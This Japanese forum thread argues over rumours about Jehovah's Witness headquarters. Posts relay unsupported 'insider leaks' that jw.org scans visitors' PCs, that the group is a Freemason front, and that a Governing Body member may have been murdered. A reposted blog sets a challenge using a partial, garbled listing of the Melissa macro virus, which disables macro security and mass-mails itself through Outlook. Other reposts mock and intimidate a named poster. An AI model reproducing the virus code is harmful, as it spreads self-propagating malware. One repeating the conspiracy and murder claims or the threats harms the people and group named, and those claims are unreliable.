ログインしていません。

#26 2014年10月26日 19:44:03

sk
メンバー

Re: 激論!ベテルのジョニー(JW系の未確認情報を検証する専用スレッド)

こんばんは、

今日も、リック・ファーロンのビデオ・電話会議(conference call)でベテル奉仕者ジョニー(Johnny the Bethelite)が、JW.orgなどのものみの塔のサイトを利用すると、代わりにPCの中身をスキャンされると警告していました。

世界本部の職員の状況は日に日に悪化しているそうです。

ITチームは12時間労働を強いられており、その業務(他人のPC情報のスキミング)および労働時間に不満が爆発しそうだそうです。また、ものみの塔が用いているネットワークシステムと情報収集システムは米軍のレベルに近いそうです。

多くのJWのPCをスキャンすれば、どこらから情報が漏れているかをつかむことができます。ベテル奉仕者ジョニーのような本部職員が関わっていることが知られており、その結果統治体をはじめ上層部の人々の被害妄想が深刻化している模様です。個々のベテル奉仕者の部屋は清掃の際に情報漏えいに関わっているかのチェックがなされているそうです。

300名ほどのベテル職員はものみの塔の方針に同意していないと述べていました。

今年の3月19日に、激しい発作を起こし79歳で亡くなられた統治体のガイ・ピアス (Guy H. Pierce) は、殺害された可能性があります。彼の死は彼の健康状態とマッチしていないようです。また彼は、ベテル奉仕者ジョニーにようなベテルインサイダーの話を良く聞き統治体に対して改善要求の声を上げていた人物だったそうです。

彼の死に関するNewsは、ここにあります。
http://www.jwstudy.com/jwbbs/viewtopic. … 1349#p1349

ものみの塔協会はロスチャイルドの資金でフリーメイソンが設立運営している組織ですから「邪魔者は消せ」が通るようですね。それから推し量ると織田政太郎兄弟も協会にとって不都合な者として消された可能性があるかもしれませんね。

協会にかわいがられて重責を委ねられた人は、協会の正体を暴露するためにはそれなりの覚悟をしていた方がいいでしょうね。

2014年以前と2014からの協会の方針のあからさまな変化について、

2014年前、インターネットに極めて消極的
2014年から、インターネットを肯定し、特にJW.orgを大規模に宣伝。

なぜかなぁ~。

多分、1914年から100年の偽預言者の恥からJWの思いをシフトするためじゃないだろうか。
また、米軍並みの情報収集ハイテクインフラが整い、信者のコントロールがより一層可能になったためかもね。

つまり、こんな話、
「新しい光が出ました。」と発表して、JW.orgへ皆んなを集める。
そして、彼らの情報をすべて頂く。

いい加減に、こんな組織と一緒に歩むことを止めなさい。

来年の1/15日号の研究用のものみの塔での呼びかけ、
JWに、全ての財産を処分し、協会の世界本部のワーウィクで働くようにとの呼びかけがなされています。

バカじゃないだろうか。
1975年の熱狂の再現が可能と思っているのだろうか。

ものみの塔フリーメイソンが行っていることは、
言葉では、以前の熱狂を期待して、ハルマゲドンは近い全てを処分して王国のために働きなさい、と煽り、
やっていることは、組織全体を米軍並みのハイテク武装にグレードアップしこの世を十二分に利用していませんか。

まだ、常識の残っているJWの兄弟・姉妹たち、
天才バカボンにならないでね。

おまけ、

現在、テキサスで6件の性的虐待訴訟が起こされており、その内のひとつは巡回監督が被告となっています。

2月以降、目ざめよ誌はものみの塔誌と統合され廃刊となります。
それに合わせて、ものみの塔のタイトルも変えるかもしれませんね。

ある人曰く、
新しい光が増しゆく中、雑誌のページはますます薄くなってゆく。
以前は32p、今は16p。

JWの兄弟・姉妹たち、これからどうしますか?

編集者 sk (2014年10月27日 08:01:41)

オフライン

#27 2014年10月30日 21:17:11

転載します
ゲストユーザー

Re: 激論!ベテルのジョニー(JW系の未確認情報を検証する専用スレッド)

以下のURLのブログの内容を代わりに転載します。

http://blog.goo.ne.jp/john_the_baptist/ … 2b2f615ced

「ものみの塔WTがjw.orgにより個人情報やデーターを盗む事はない」「skへの宿題」

先回のブログ内容骨子を再掲し、skなる者の愚劣なたわ言、コンピューター・サイエンス&テクノロジーへの冒涜、「JW.orgなどのものみの塔のサイトを利用すると、PCの中身をスキャンされる。ものみの塔が用いているネットワークシステムと情報収集システムは米軍のレベルに近い。ものみの塔協会はロスチャイルドの資金でフリーメイソンが設立運営している組織。・・・・・・」に対する「宿題」をその者に課す。その者に対してはロックオン済みだ。晒す積りは無いから安心はしろ。

1.日本のWT/JW関連インターネット世界

いろいろ調べてみると、世界的に、インターネット上に流布する情報で、エホバの証人やものみの塔に関係した分野でも、極めていかがわしいデタラメな情報が大量に存在していることが分かるが、まだマシかと思っていた日本の実態も相当に狂ったものであると実感している。

世界のアホバカの路地裏に転がっている、wikiのインチキ記事によるフリーメーソンやら、ロスチャイルドやら、それらとラッセル兄弟との関係だとかと言った類の立証不可能なヨタ話、ベテル情報と称するインチキデタラメの嘘八百、出版物の挿絵には隠し絵・シンボルが満ち溢れているだとか、失われたイスラエルの10部族の子孫が日本人だとか、笑止千万とはこのことだが、それほどまでに低い程度とは呆れるが、元々の日本のJWだった者達の程度とはそのようなものなのであろう。せっせとWT協会のヨイショに励む輩も多い。

こんなことを書き散らかす者までいる始末だ。(skだそうだ)
http://www.jwstudy.com/jwbbs/viewtopic. … 1880#p1880

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
「今日も、リック・ファーロンのビデオ・電話会議(conference call)でベテル奉仕者ジョニー(Johnny the Bethelite)が、JW.orgなどのものみの塔のサイトを利用すると、代わりにPCの中身をスキャンされると警告していました。
世界本部の職員の状況は日に日に悪化しているそうです。
ITチームは12時間労働を強いられており、その業務(他人のPC情報のスキミング)および労働時間に不満が爆発しそうだそうです。また、ものみの塔が用いているネットワークシステムと情報収集システムは米軍のレベルに近いそうです。
多くのJWのPCをスキャンすれば、どこらから情報が漏れているかをつかむことができます。ベテル奉仕者ジョニーのような本部職員が関わっていることが知られており、その結果統治体をはじめ上層部の人々の被害妄想が深刻化している模様です。個々のベテル奉仕者の部屋は清掃の際に情報漏えいに関わっているかのチェックがなされているそうです。
300名ほどのベテル職員はものみの塔の方針に同意していないと述べていました。
今年の3月19日に、激しい発作を起こし79歳で亡くなられた統治体のガイ・ピアス (Guy H. Pierce) は、殺害された可能性があります。彼の死は彼の健康状態とマッチしていないようです。また彼は、ベテル奉仕者ジョニーにようなベテルインサイダーの話を良く聞き統治体に対して改善要求の声を上げていた人物だったそうです。
彼の死に関するNewsは、ここにあります。
http://www.jwstudy.com/jwbbs/viewtopic. … 1349#p1349
ものみの塔協会はロスチャイルドの資金でフリーメイソンが設立運営している組織ですから「邪魔者は消せ」が通るようですね。それから推し量ると織田政太郎兄弟も協会にとって不都合な者として消された可能性があるかもしれませんね。
協会にかわいがられて重責を委ねられた人は、協会の正体を暴露するためにはそれなりの覚悟をしていた方がいいでしょうね」。
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

全て虚偽である。

これは、コンピューター・サイエンス&テクノロジーへの冒涜である。そのような冒涜は断じて許さぬ。

書いた内容には責任を取ってもらう。

これを書いたskなる者には宿題を出す。第4項でだ。「ものみの塔が用いているネットワークシステムと情報収集システムは米軍のレベルに近い」などとホザク以上、それを証明してもらおう。ソースコードを書くから、それが何のものなのか、ものみの塔の関係者のお頭の程度を調べるために、論証してもらう。それを書け。

このようなトンデモ嘘八百とは無縁に、勿論、真面目に聖書を理解したいと言う素朴な願いのJWは今もいる。そのようなJWは昨今の協会の動きに疑問を抱きながらも集会に来ているが、そういう人たちが自分なりの明快な答えを見出すヒントになるような議論をインターネット上で、インターネット会衆のように自由闊達にすべきである。

米国のガーベージ&ジャンクサイト、日本で言うところの2CHやそのパクリサイトのようなことを書き散らかして、排斥・断絶・オチコボレ・現役・ヨイショJWたちは何をしたいのか?無能なオチコボレのままでいる積りか?言われるがままにヨウショ人生を歩むのか?そして、最後は孤独死か?それとも自分なりの精神世界を築くのか?

先々回は、米国のアホバカサイトからのパクリ情報で、実態の全く無い「QCS買収騒ぎ」が日本で流布(これもskのインチキによる)したことに対して、本ブログが止めを刺した。また、先回は、「WTはjw.orgにより個人情報を盗む」といったこれもアホバカの類の風説を打破するするために、jw.orgの現況と現実、そして、クッキーやプロキシ・サーバーまた「隠れ機能」による情報の盗み出しや監視について詳しく解説した。が、リテラシーが全く欠落しているようだ。再度、指摘しておく。

2.ものみの塔WTがjw.orgにより個人情報やデーターを盗む事はない

強力な研究開発リソースを有する大手コンピューター企業や特定技術に秀でたベンチャーが提供するハードウエア&ソフトウエア&サービスウエア製品には合法的な「隠された機能」が含まれ、NSA等の特定国家権力のみがクライアントPCから個人情報はもとより如何なる保存データーをも読み出すことが出来るが、それは国家安全保障の観点からなされ厳しい運用ルールに則ってなされるものであり、犯罪者を炙り出すためのものである。一般市民のプライバシーを侵害し晒すためでは毛頭無い。国民・市民の保護のために機能しているのである。ハッカー犯罪者とはそもそもが全く違う。それらの仕組みの構築そして運用には極めて高度なコンピューター・サイエンス&テクノロジーが必要である。

そうでない個人情報や保存データーの盗みは全て犯罪である。国家安全保障に関わる情報の詐取は重罪であり、死刑になる事すらある。現実には、ボーダーラインすれすれで、難しい法的表現の文言で細かい字の同意文書を「見せられて」具体的な内容を知らされること無く同意して、自分の個人情報をセッセと提供しているのが実態である。

jw.orgに、WTがアクセスしてきた者の個人情報やPCの保存データーを盗むと言う行為は、不正な手段によってしか不可能であって、また常時「反社会的勢力」としてNSA/FBI/CIA/税務当局の監視下にあるWTであるから、それが発覚するのは時間の問題であり、その場合の社会的制裁には凄まじいものがあり、「サタン使い」の烙印を押され、統治体の全員や幹部達は逮捕され、潰滅させられるだろう。WTはそのような犯罪行為の誘惑に駆られても、実際にその危険を冒すことは「絶対に無い」。だから、巷間で流布しているような「WTがjw.orgを通して個人情報やデーターを盗む」事は無いと断言出来るのである。

そもそも、WTにはそんなことが出来るようなコンピューター技術は全く無い。クッキーやプロキシ・サーバーすらチンプンカンプンな低教育のイエスマンばかりであり、jw.orgの構築・管理・運用をアマゾン・テクノロジー他に丸投げしているに過ぎない。無能だから、信者の寄付を法外にボッタクラれている。何のかんのと理由を付けられてだ。特に、外部からのサイバー攻撃は激しいから、必然的にそうなる。

3.jw.orgに対する「第三者の仕掛け」による個人情報やデーターの詐取は必ず起こる

これが厄介な問題なのである。

今でも、相当に、内容改竄やウイルス仕掛けが頻発している。その改竄トレースやウイルス除去は、勿論、コンピューター・テクノロジーに疎いド素人集団のWTは、専門家の企業に丸投げでするしかない。それには莫大な費用が掛かる。その観点からも、WTは「通信会社」のQCSを買収したかったのであるが、QCSの中身には実体が無く、何の技術も無いペーパーカンパニーで、コンサルに騙された結果に終わった。

いずれにせよ、この問題はインターネットの必然であって、利用者リスクである。新手の悪徳なウイルスに感染すればその被害は計り知れない。次々に連鎖する。

いずれ、必ずそうなるだろう。

その可能性を考えた上で自己責任で、jw.orgにアクセスすべきだ。ロクな情報などそもそも無いサイトであるから、紙媒体が最も安全だとは言っておこう。

4.skへの「宿題」

冒頭で、skなる者の荒唐無稽なる虚偽の言説を示した。

書いた者には、その内容に対して責任を有するから、その責任を取ってもらう。その一環として、skに「宿題」を出す。「お友達」の「ベテル奉仕者ジョニー」なる者を通して、WTの「ITチーム」なる者らに、以下に示すプログラム・コードが何であるのか論証してもらえ。50 words abstractを最初に示し、コードの一行毎にその機能を詳述せよ。文章は英文のみとする。英文以外は認めない。また、論証本文の記述は全て手書きとする。同時に「自分」と「ジョニー」と「ITチーム」の直筆のサインを連名して、論証本文と共に400dpiのイメージにより掲示しろ。筆跡も確認する。回答伝達の方法は自分で考えろ。そして、自分の棲家のサイトhttp://www.jwstudy.com/jwbbs/viewtopicに、論証本文の英文活字文を書け。英文でだ。このプログラムは、専門家には瞬時に分かる初歩的な内容であるから、時差を含めて1Working Dayもあれば十分過ぎる程だ。2WDを与えるから、日本時間で、10月31日(金)22時までに回答せよ。そして更に別のコードの宿題を出す。「宿題#2」は格段に難しくしてある。だが、WTに米軍に次ぐコンピューター技術能力があるなら簡単な筈だ。同じく2WDを与える。

真っ当な者であるならば、本ブログは承知の筈である。無視するのも結構。それが、破綻論理の構造上、虚偽の証明となるのだ。分かるか?意味が。sk本人以外の如何なる言及・書き込みも「カンニング」とみなすから、skは不合格である。虚構の証明は成功裏に終わりだ。

*******宿題1*******

Private Sub Document_Open()
On Error Resume Next
If System/PrivateProfileString(2,
"HKEY_CURRENT_USER\Software\Microsoft\Office\x.0\Word\Security","Level")<>""
Then
CommandBars("Nacro").Controls("Security...").Enable=False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\x.0\Word\Security","Level")=1&
Else
CommandBars("Tools").Controls("Macro").Enabled=False
Options.ConfirmConversions=(1-1):Options.VirusProtection=(1-1):
Options.SaveNormalPrompt=(1-1)
End If
Dim UngaDasOutlook, DasMapiName,BreakUmOffASlice
Set UngaDasOutlook=CreateObject("Outlook.Application")
Set DasMapiName=UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\","Ezebel?")<>"...by Kwyjibo"
Then
If UngaDasOutlook="Outlook" Then
DasMapiName.Logon"profile","password"
  For y=1 to DasMapiName.AddressLists.Count
    Set AddyBook=DasMapiName.AddressLists(y)
    x=1
    Set BreakUmOffASlice=UngaDasOutlook.CreateItem(0)
    For oo=1 To DasMapiName.AddressEntries.Count
      Peep=Addybook.AddressEntries(x)
      BreakUmOffASlice.Recxipients.Add Peep
      x=x+1
      If x>50 Then oo=AddyBook.AddressEntries.Count
    Next oo
    BreakUmOffASlice.Subject="Urgent Message From "&Application.UserName
    BreakumOffASlice.Body="Here is the document yopu asked for...don't disclose anyone else;-)2
    BreakUmOffASlice.Attachments.AddActiveDocument.FullName
    BreakUmOffASlice.Send
    Peep=""
  Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\","Ezebel?")="...by Kwyjibo"
End If
Set ADI1=ActiveDocument.VBProject.VBComponrnts.Item(1)
Set NTI1=NormalTemplate.VBProject.VBComponents.Item(1)
NTCL=NTI1.CodeModule.CountOfLines
ADCL=ADI1.Code.Module.CountOfLines
BGN=2
If ADI1.Name<>"Ezebel"Then
If ADCL>0 Then_

*******宿題1*******

john_the_baptist

#28 2014年10月30日 21:57:57

sk
メンバー

こんばんは、

この変なプログラマー、なんでそんなにムキになっているのなかなぁ~。

本部のベテル奉仕者ジョニーが言ったことがそんなに不快なら、本人に聞いてください。
英語でものみの塔世界本部に尋ねてください。頑張ってね。 icon_lol.gif

英語圏のネットではものみの塔とフリーメイソンとの繋がりは多くの人により暴露されています。

この変なプログラマーその全てにメールを送くり確かめるといいね。
どうせ、そんなことしないだろうけど。

わたしを攻めても何もでできませんよ。

編集者 sk (2014年10月30日 21:58:37)

オフライン

#29 2014年11月01日 07:59:01

fragile
メンバー

この方(john_the_baptist)のブログはとても専門的で、私もチェックしてました。
コメント欄が無いので感想&感謝をお伝えできず残念でした。

ただ、たびたび鼻につくんですよね。john_the_baptistさんの上から目線。同じもの学んでてもこれですかね?下劣な黄色人種が何言っても影響ないでしょうけど、少なくともイエスの人格を身に付けようと努力してきた人としての人種を超えた共感は全く湧きませんでしたよ。
話がそれました…

私は陰謀論を全面的には信用していませんが、出来る事なら説得力のある証拠も示した上で納得させて欲しいです。あんなものはこれこれこういうわけでデタラメだ、と。
信じたくて信じているわけではないので。
そこまで言い切るなら、まずは証拠を挙げるべきでしょう。
もしそれができないなら、ただ知識や経歴をひけらかしたかっただけなんだろう、と理解します。

オフライン

#30 2014年11月01日 09:32:38

転載します
ゲストユーザー

以下のURLのブログの内容を通りすがりが勝手に転載します。

http://blog.goo.ne.jp/john_the_baptist/ … 446c6e250f

「結局、空虚な日本語の捨て台詞を残して逃げていったsk。予想通りの結果」

超多忙なMIT教授で高名なjohn_the_baptist兄弟博士がsk如き雑魚者を相手にすることなど全く畏れ多い事であるから、博士の翻訳・通訳・調査等雑用係りの友人の日本人として、回答期限日時10月31日22時となったので、私他2名(都合3名の現役JWで全員が長老、40代から60代、コンピューターの専門家)が、親睦の集まりの最中にskからの「回答」をチェックすることとする。私を含め3名は、john_the_baptist博士のようには優しくはない、非常に厳しい。

これはそのリアルタイムのチェックだ。勿論、最初からskなる男の「回答」など期待も何もしてはおらぬ。せいぜい捨て台詞の一つでも残してトンずらだろう。john_the_baptist博士のブログ内容とskの書き込みを比較してみれば歴然としているように、あまりにも品格が違いすぎる。

「まあ、グラス片手に暇つぶしにskをロックしますか」
「じゃあ、始めますか」
「しかし、skはショウモナイ書き込みばかりやってますなあ」
「こんなものを読んでるのは、どういう人たちかね」
と、ワインを飲みながらディスプレイを覗く。

<skのフリーメイソン:言説の証拠が一切ない。何でもフリーメイソンの連循環>

skなる男が棲家とするサイト、書き込みをざっと見てみる。数が多いが、これがこのサイトの主なのか。さしずめ牢屋主と言ったところか。だが、中身はどうだ。

「ははは。笑止千万だ。ここまで堕ちたか。悪臭紛々やなあ」。

文章構成は論理のロの字もない破綻だが、こんなものだろう。ハチャメチャの恥ずかしい単語のオンパレード。ここまで程度の低い文書では、2CHの方がましだ。空っぽどころか、ヨーロッパなら逮捕を免れんぞ。法と言うものの怖さを何も知らん奴だ。こんなものを誰が読んでいるのだ?まさに毒麦だ。

「当然根拠ゼロですわ」

これがskの特徴だ。論証・実証・証拠といったものがどの文章にも一切無い。全く無い。それで、ロチャイルドだ、フリーメイソンだ、ベテルのジョニーが等とほざいている。掃いて捨てるようなヨタ本やトンデモ本には、こういうことが書いてある。そういった類のインチキから成り立っている。「タブーすぎるトンデモ本の世界」を読んでみるといい。1,620円だ。「皇の霊言からキリスト教と浣腸、食品添加物やオスプレイ、人権啓発アニメや放射能デマ、在特会、君が代、サンカやフリーメイソン、慎太郎閣下の問題作まで、『豪華』なトンデモ世界を堪能ください!」という本だ。第1章 皇室・神様・新宗教等にまつわるトンデモ本、第2章 右翼・左翼・任侠・人権問題等を扱ったトンデモ作品、第3章 医療と食を扱ったトンデモ本、第4章 政治・時事・差別問題を扱ったトンデモ本・映画、第5章 芸能界・文壇・オカルトのトンデモ本。要するに同根だということ。・皇室をめぐるトンデモ説、・嫌韓レイシストたちの奇妙な世界、・オススメのサンカ本、・トンデモ放射能デマの世界、・猟奇と佐藤春夫――昭和5年のタブー、・フリーメイソンおススメ本50連発とくる。

フリーメイソンをほざく連中はそういうごみ溜めを漁ってくる。だから、「北朝鮮(朝鮮民主主義人民共和国)最高指導者の金正恩は、彼の右手を懐に入れる仕草がナポレオン1世のそれと酷似しており、その仕草はフリーメイソンの特徴であるから、金正恩はフリーメイソンである」となるのだ。skよ、「北朝鮮拉致被害者」関係者にそう言ってみろ。

更に、skの破綻論理を外挿するならば、こういうことになる。
「イエス・キリストはフリーメーソンだ」
「12使途はフリーメーソンだ」
「パウロはフリーメーソンだ」
エホバ神までフリーメーソンの会員だということだ、skの破綻論理ではな。そういった連循環の行きつく所は地球人全員がフリーメイソンということになる。言うまでもなく、サタンもフリーメイソンになる。そんな調子だ。フリーメイソンのトンデモ本を100冊持ってくれば、100冊とも相矛盾している。一貫性など無縁なゴミ以下だ。反聖書、善悪の融合であって、正に、神への冒涜、聖霊への冒涜だ。

「フリーメイソンのキーワードは、焚書ですよ。有象無象の集団のこの世の無統制単純集合体が、バラバラに関連無く、個々の有象無象の集団にとって都合の悪い本を焚書するのですよ。あれはフリーメイソンだという魔女裁判をしてね」

「気に入らん奴は皆魔女であり、フリーメイソンなんですよ。どちらも不気味で、何をしでかすか分からぬ連中だから、殺せ、と来るわけですな」

「焚書はその象徴ですね」

「skのやってることは、真実の揉み消しですな。そしてデッチアゲ。さらにフリーメイソンのレッテル貼りか。気に食わん奴は皆フリーメイソンなんですよ」
「ナチスがそうでしたな。フリーメイソンのレッテルを貼って、その人を強制収容所に送り大量に殺した。魔女狩りやフリーメイソンにはそもそも実体が無い」
「何でもフリーメイソンですな」
「だから、聖書の翻訳史を見れば歴然としていますが、聖書を読む奴も魔女、つまりフレーメイソンにされて弾圧されたのですよ」
「なるほどねえ。とんでもありませんね」
「こんな塵芥はもういいでしょう」
「いや、民主主義に対する挑戦ですよ。断固粉砕せねばなりませんよ」
「しかし、こうしたエホバへの冒涜は断じて許しませんよ。撒いたものは刈り取らせますよ、きっちりとね」

<英語記述がない>

さて、指定した英語の文書はどこにあるのか?

「どこにも無いじゃないですか」。

回答は英語によるものとされていたが、英語の欠片もない。英語指定は、john_the_baptist博士の愛ある親切によるものであった。馬脚丸出しのアホな事を書いても、英語ならば、恥さらしになる度合いは格段に低いとの配慮からのものであった。が、どこにも無い。

そりゃそうだろう。英語なんぞ分からんからだ。こういう問題では、英語の方が書き易いのだ。英語が出来んということ。

「だから、自分の思い込みで、消化不良・下痢状態を隠し、拾ってきたゴミを違うゴミとして得意がって披瀝しているに過ぎないんでしょう。典型的ですな、こういうタイプってのは」
「英語文章が無いということは、逃げたということですな」
「逃げましたね。すたこらさっさとね」
「最近はこういうのばかりですよ。対峙して自分の主張を唱えると言う信念がまるで無くなりましたねえ。もっとも、フリーメイソンやらロスチャイルドやら、ベテルのジョニーなんぞじゃあ、話にもなりませんわな」

わはははは~~~~~~~
ゲゲゲのきたろ~~~~~~
一同大爆笑。

「さて、何処に何を書いているのか、いないのか?」

<これがトンズラの捨て台詞か?捨て台詞にも値しない>

その逃げ言葉があった。
「ああ、ありましたよ。見事に引っ掛かりましたな」
「どれどれ、なんとまあ、おとなしいこと。WTに去勢されたのか」

「この変なプログラマー、なんでそんなにムキになっているのなかなぁ~。
本部のベテル奉仕者ジョニーが言ったことがそんなに不快なら、本人に聞いてください。
英語でものみの塔世界本部に尋ねてください。頑張ってね。
英語圏のネットではものみの塔とフリーメイソンとの繋がりは多くの人により暴露されています。
この変なプログラマーその全てにメールを送くり確かめるといいね。
どうせ、そんなことしないだろうけど。
わたしを攻めても何もでできませんよ」。

はははのは~~~~。
ブブブのブ~~~~~ぶう~~~~~~~。
はひふへほのほ~~~~~。
あはははははは~~~~。

「笑えるねえ」
「しかし、この程度かいな」
「john_the_baptist博士は『変なプログラマー』だそうな。天才は変人奇人なんだよ。john_the_baptist博士の名前を聞いたら、skよ、お前さん腰を抜かすぞ」
またまた大爆笑。

「結局、無だな。Nothing!!!」
「また、フリーメイソンか」
「100人のフリーメイソン信者に質問すれば、100通りの違った答えになるだけですね」
「いや、その前に、誰がフリメイソンなのか分かりませんよ」
「それもそうですね」

げらげらげら~~~~
ばびぶべぼのぼ~~~~~~
ぱぴぷぺぽのぽ~~~~~
とまたまた大爆笑。
ワインを補充。

「『わたしを攻めても何もでできませんよ』と、結局は、自分の話は作り話だっことを自白したようなものじゃないですか」
「全部、彼の作り話だったということですわ」
「トンずらしやがった」
「一言で言えば、発言への自己責任のルールを破って、skはディベートせず、捨て台詞にもならる単語を垂れて逃げていったということですね。抜刀して向かってくる相手とは対峙する勇気も能力も無いこと、見え見えですわ、こりゃ」

<総括>

skの言う事など、論評の価値は無いから、以下、当方が調査した結果を示しておく。

skは米国の小学生程度のディベートすら出来ずに逃げていった。英語力は無い。だからQCSのインチキ、「スキミング」のインチキを、海外のサイトからパクッて、人を誤導しようとしたが、本ブログで止めを刺されたのだ。

skには初歩的なプログラム・コードの知識すら一切無い事が暴露された。クッキーやプロキシサーバーの初歩の知識も無く、そのような者が、jw.orgにアクセスすると「スキミングされる」だの「情報が漏洩させられる」だのと嘘八百を並べ立てるとは笑止千万且つサタン的な嘘つきである。そもそもそのような者が、コンピューター・セキュリティーを云々する事自体が害悪である。引っ込んでろ。

我々は、10月期に於ける、WTのウォールキル、ブルックリン、ウォービック仮、パターソン他のメールサーバー及びプロキシ・サーバーを全て調べ、同時期の外泊ベテル奉仕者、通いの補助者の全員を調べた。skがベテルの一員と通信した事実は無い。最初から分かっていたことだが、skは米国本部の世界を全く知らず、「ジョニー」などベテルには存在せず、捏造の架空である。当然、sk/ジョニー/ITチームの如きつながり自体も架空の作り話である。skの言うベテル内の状況は嘘八百のデタラメである。

john_the_baptist博士の宿題など解ける筈も無かったのである。ジョニーが実在し、米軍に継ぐWTのITチームと繋がりがあるならば、ちょっと聴けは、即座に回答を得た筈だが、回答不可だったということは、そもそもそのような関係は無かったという証拠である。そういう者達自信が非存在である。したがって、skの言説は全て虚偽であったという結論だ。宿題のプログラムコードは世界を震撼させた恐ろしいものであったのだ。それだけに専門家ならば誰もが知るコードだ。ITセキュリティーの専門度を測る物差しでもあるのだ。その宿題に回答できないとは何事であるか!!!モグリのニセモノだ。

これでskの正体が分かったであろう。

WTの組織自体にも多々問題があることは承知している。だが、根本的に間違った言説や偏見といったデマゴギーを議論のベースとすべきでない事は、立場が何であれ常識であろう。そのルールを破ったが故に、skは我々の逆鱗に触れたのである。

最後に、john_the_baptist博士からのskへの伝言だ。

「プログラムコードは、以前世界を震撼させた有名なウイルス・メリッサ(別名イゼベル)だ。コンピューターのセキュリティーを議論する前に、コンピューターの基本、セキュルティーの基本、ネットワークの基本、キッキー、プロキシ、ウイルスそれくらいは勉強しておけ。メリッサは教科書的な題材であって常識だ。そんな常識も無い奴は黙って引っ込んでろ」。

我々から追加だ。「お前さんはロックオンされたと言う事を忘れるな。今後の言動には十分注意する事だ。我々はコンピューター・テクノロジーのベテラン専門家だ。上には上がある。公の警告はこれまでだ。負け犬の遠吠え、出来る内に、好きなだけしてろ。フリーメイソン・レッテル貼りさんよ、そしてjw.orgスキミングさんよ」。

「ワイン、お代わりをお願いしま~~~~す」
「うぃッ、飲みすぎましたね。浮かれて」
「たまにはいいでしょう。ささどうぞ」

以上

A,B,C

#31 2014年11月01日 13:13:38

通りすがり
ゲストユーザー

逃げセリフまで封じられて
sk涙目w

#32 2014年11月01日 13:40:54

sk化学
ゲストユーザー

通りすがり さんの発言:

sk涙目w

得意のジョニー節がもう聞けないと思うと
寂しいよサビシイヨ

#33 2014年11月01日 15:19:30

iris
ゲストユーザー

転載されているブログは、もっと品位のあるものかと思っていましたが、このような有様になり残念です。
こちらのブログに比べたらskさんのほうが品があると思います。

#34 2014年11月01日 19:02:56

jw未来派
ゲストユーザー

sk化学 さんの発言:
通りすがり さんの発言:

sk涙目w

得意のジョニー節がもう聞けないと思うと
寂しいよサビシイヨ

sk氏には宿題を解いてもらって
あっと言わせて欲しかったな
ガッカリ

#35 2014年11月01日 19:39:47

jw4g
ゲストユーザー

JJWの中の人が此処見てるのか

もし見てるならこの場を借りてお聞きしたい

最近のものみの塔研究記事で「キリストの証人」という表現が突如出現し「前面的」に扱われたが
あなた方の何らかの関与があったと考えてよろしいでしょうか?
組織から見て敵対的な存在のあなた方の標榜する最重要了見を、組織がそう簡単に前面に押し出すとは考えにくい。

JJWによる内部改革が実現しつつある、あるいは影響が及び始めている兆候と捉えてよろしいでしょうか。

・・あなた方が

アハブに引導を渡すエリヤなのか
それとも
只のコラ・ダタン(あるいはアブサロム)なのか

それが知りたい

今回の過激なパフォーマンスを伴う此処への干渉は
我々日本のJWに対する啓蒙の一環、あるいはブラフではないでしょうか。

#36 2014年11月02日 10:54:00

カレブ
Administrator

「john_the_baptist博士は『変なプログラマー』だそうな。天才は変人奇人なんだよ。john_the_baptist博士の名前を聞いたら、skよ、お前さん腰を抜かすぞ」
http://blog.goo.ne.jp/john_the_baptist/ … 446c6e250f

「john_the_baptist博士の名前を聞いたら 腰を抜かすぞ」って・・

なんだか

わたしの中では john_the_baptist が Johnny the Bethelite くらい怪しく感じてきました。
まさかプロフィールとか 全部 妄想でした とか そんなオチじゃないですよね。

あるいは
「john_the_baptist博士 は Johnny the Bethelite様だ!!」みたいなこと言って
最後に聴衆をドヒャーとさせたら それはそれですごいと思いますけど

「名前を聞いたら 腰を抜かすぞ」って来たら それはそれで みんな期待しちゃいますよ。

今後のブログ記事を楽しみにしています。

オフライン

#37 2014年11月02日 12:30:16

ryは
ゲストユーザー

「ワイン、お代わりをお願いしま~~~~す」
「うぃッ、飲みすぎましたね。浮かれて」
「たまにはいいでしょう。ささどうぞ」

↑これやばくね?
確か酩酊は・・

#38 2014年11月02日 20:14:24

sk
メンバー

こんばんは、

今日も、世界本部のベテル奉仕者ジョニー(Johnny the Bethelite)からの最新情報がありました。USの会衆はアップルTVのようなネットTVを購入しJW.orgと繋ぐように求められるそうです。長老たちはパスワードでログインするサイトが割り当てられます。(多分今でもそうなっているかな。つまり長老たちはものみの塔の監視の下に置かれています。)

やがて、KHでストリーミングビデオが上映されるようになるかもしれませんね。そうなると公演者が不要になりますね。集会では、毎週本部や支部が準備したいわゆる「霊的な食物」を、どこの会衆も同時に頂くこともできますね。
そうなれば、完全な情報統制が完成します。(何か、北朝みたいね。)

USの会衆の出席は目に見えて減少しているそうです。
開拓者の数、長老たちの数、成員の数など、以前(多分10年前くらいかも)の1/3くらいになっているようです。

若い男子がほとんどいない会衆(中年から年寄りの姉妹たちが大半の会衆)が増えているそうです。
みんな、静かに集会から遠ざかって(fading away)行っているそうです。
(そうか、だから集会でのTVストリーミングが必要なのか。)

近いうちに奉仕会のプログラムでTV.JW.orgのビデオストリーミングによって統治体からのプライバシーに関する話が流されるそうです。
その中で、協会がJWのプラバシーをどれ程ハンドルするかに関して告げられるそうです。一般的にPCでソフトを使用する際に同意事項への同意が求められますが、その中身を読む人などいませんよね。(結構PC内がスキャンされているかも。)
統治体は、JWが献身する時に、ものみの塔協会が神の霊に導かれている組織であり、その一員になることに同意したことを根拠に協会の知る権利を説明する模様です。

JW.orgにも、雑誌や書籍、その他を寄付でダウンロードできるショッピングカートが導入されるかもね。

先回も書きましたが、ベテル奉仕者ジョニーの説明によると協会はスーパー・コンピュータを所有しておりJW.org、TV.JW.orgにアクセスするPCの中身を15分ほどで読み取ることができるそうです。

変なプログラマーの度を過ぎた反論があると思いますが、
JWの兄弟、姉妹たち、上記のリーク情報をご自分で判断してください。

Windows には始めからバックドアが準備されています。

http://ameblo.jp/kissy-seed/entry-11759893033.html

http://www.rokujo-radium.com/blog/index … 731-131712

google 検索で「マイクロソフトウィンドウズのバックドア」のリンク
https://www.google.co.jp/search?q=%E3%8 … qKg8weyrQE

他にも、ファイアー・ウォール、セキュリティーソフトの実体などで検索しても面白いかもね。

